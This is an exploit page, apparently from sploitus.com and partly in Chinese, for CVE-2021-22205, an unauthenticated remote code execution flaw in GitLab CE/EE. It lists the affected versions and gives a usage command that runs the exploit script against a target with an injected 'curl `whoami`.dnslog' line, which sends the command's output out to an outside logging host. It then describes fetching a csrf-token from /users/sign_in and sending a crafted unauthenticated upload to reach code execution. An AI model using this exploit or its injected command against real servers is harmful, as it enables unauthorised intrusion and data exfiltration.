Share
## https://sploitus.com/exploit?id=D745F7C4-87A0-56AB-9403-D0282C5A8C99
# CVE-2021-22205

**影响版本:**
* Gitlab CE/EE < 13.10.3
* Gitlab CE/EE < 13.9.6
* Gitlab CE/EE < 13.8.8

**Usage**

```
python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog"
```

![Xnip2021-10-28_21-54-04](media/16354286989629/Xnip2021-10-28_21-54-04.png)

**获取csrf-token:**

![Xnip2021-10-28_21-44-31](media/16354286989629/Xnip2021-10-28_21-44-31.png)

通过 /users/sign_in 获取csrf-token 然后使用前面的 CVE-2021-22205 poc 进行构造上传包进行执行未经身份验证的上传请求,最终rce

![](media/16354286989629/16354299891310.jpg)


![Xnip2021-10-28_21-43-13](media/16354286989629/Xnip2021-10-28_21-43-13.png)


**ref:**

* https://hackerone.com/reports/1154542
* https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
* https://forum.ywhack.com/viewthread.php?tid=115611
* https://forum.ywhack.com/viewthread.php?tid=116706
* https://github.com/RedTeamWing/CVE-2021-22205